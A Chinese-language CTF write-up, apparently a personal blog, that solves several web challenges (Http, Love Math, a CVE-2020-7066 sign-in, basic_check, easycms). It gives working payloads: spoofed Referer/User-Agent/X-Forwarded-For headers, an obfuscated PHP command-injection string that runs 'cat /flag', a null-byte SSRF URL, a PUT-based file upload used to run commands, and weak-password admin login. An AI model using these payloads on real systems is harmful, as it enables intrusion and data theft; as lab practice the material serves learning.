无题
[极客大挑战 2019]Http
f12,发现有secret.php,手动访问,发现提示不是从xx转过来
修改包:
Referer: https://Sycsecret.buuoj.cn
新任务是浏览器,修改包:
User-Agent: Syclover
说只能本地读取,xxf
X-Forwarded-For: 127.0.0.1
获得flag
[CISCN 2019 初赛]Love Math
限制长度,过滤了一些字符,有白名单,过滤白名单外的函数
贴了给常见数学函数,我们用进制转换就好,由于对c有过滤考虑传入a,b对其进行命令拼接
1 | c=($_GET[a])($_GET[b])&a=system&b=cat /flag |
将其转义
1 | c=$pi=_GET;&&pi{pi}($$pi{abs})&pi=system&abs=cat /flag |
pi{pi}和$$pi{abs}访问了pi下的pi和abs,相当于
1 | $__GET[a] ($_GET[b]) |
将_GET转义
1 | c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){cos})&pi=system&cos=cat /flag |
dechex将十进制转换为16进制,dechex(1598506324)=5f474554,base_convert(37907361743,10,36)将37907361743转为36进制,值为hex2bin,hex2bin(5f474554)=_GET
传入即可
参考https://www.bilibili.com/read/cv18827663/
[GKCTF 2020]cve版签到
抓包,发现有url传参,猜测是ssrf
没有反应
存在cve-2020-7066
get_headers()含0字符截断
You just view *.ctfhub.com提示以
*.ctfhub.com结尾
payload:?url=http://127.0.0.1%00www.ctfhub.com
主机名要以123结尾
[NSSRound#1 Basic]basic_check
发送put请求
http://node4.anna.nssctf.cn:28929/1.php?ifyou=cat%20/flag
可以看到1.php被创建
在1.php下传参
[GKCTF 2021]easycms
存在admin.php
弱口令:admin 12345
登录成功
存在导出页面
下载链接
存在任意文件下载
更改后面的编码部分为flag
修改为txtz=得flag
NSSCTF{eaa91728-9290-4887-9b95-42e6837108dc}